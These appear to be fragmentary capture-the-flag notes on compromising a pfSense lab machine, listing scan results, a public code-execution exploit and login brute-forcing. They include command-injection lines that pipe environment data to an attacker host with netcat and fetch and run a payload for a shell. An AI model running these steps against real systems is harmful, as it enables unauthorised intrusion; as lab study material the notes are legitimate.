PORT STATE SERVICE VERSION
80/tcp open http lighttpd 1.4.35
|_http-title: Did not follow redirect to https://10.10.10.60/
|_http-server-header: lighttpd/1.4.35
443/tcp open ssl/http lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
| ssl-cert: Subject: commonName=Common Name (eg, YOUR name)/organizationName=CompanyName/stateOrProvinceName=Somewhere/countryName=US
| Not valid before: 2017-10-14T19:21:35
|_Not valid after: 2023-04-06T19:21:35
|_http-title: Login
|_ssl-date: TLS randomness does not represent time
We find a webpage: Now copying as curl command from burpsuite after intercepting a test login:
Can use burpsuite proxy to intercept the request too.
Using exploit from github https://github.com/lawrencevanlaere/pfsense-code-exec/blob/master/pfsense_exec.py python3 pfsense_exec.py nc
Opening the rrd graph: Following the instructions and doing the following in burpsuite:
Now checking badchars with: echo+abc/|nc+10.10.14.24+1234 Now we get no output So / is a badchar. Checking env with env|nc+10.10.14.24+1234 We find that HOME is / so we can use backslash from there Now can read user.txt and root.txt
Now setting nc so that it sends the file cmd: nc -lnvp 9001 < cmd Then on burpsuite nc 10.10.14.24 9001|python& Now we get a shell:
First getting a post request in burpsuite: Now copying the required part. We need the csrfmagicktoken from the website so using ctrl+U Now writing a python script to bruteforce the password: